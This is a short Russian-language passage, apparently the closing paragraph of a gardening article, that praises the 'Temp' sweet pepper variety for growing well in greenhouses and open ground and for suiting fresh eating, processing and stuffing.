В заключении хотелось бы добавить, что перец Темп поистине универсален. Он замечательно растет и созревает как в теплице, так и в открытом грунте, его плоды хороши как в биологической, так и в технической спелости, перец Темп хорош и для употребления в свежем виде, так и для всех видов переработки, фаршировки и приготовления различных блюд.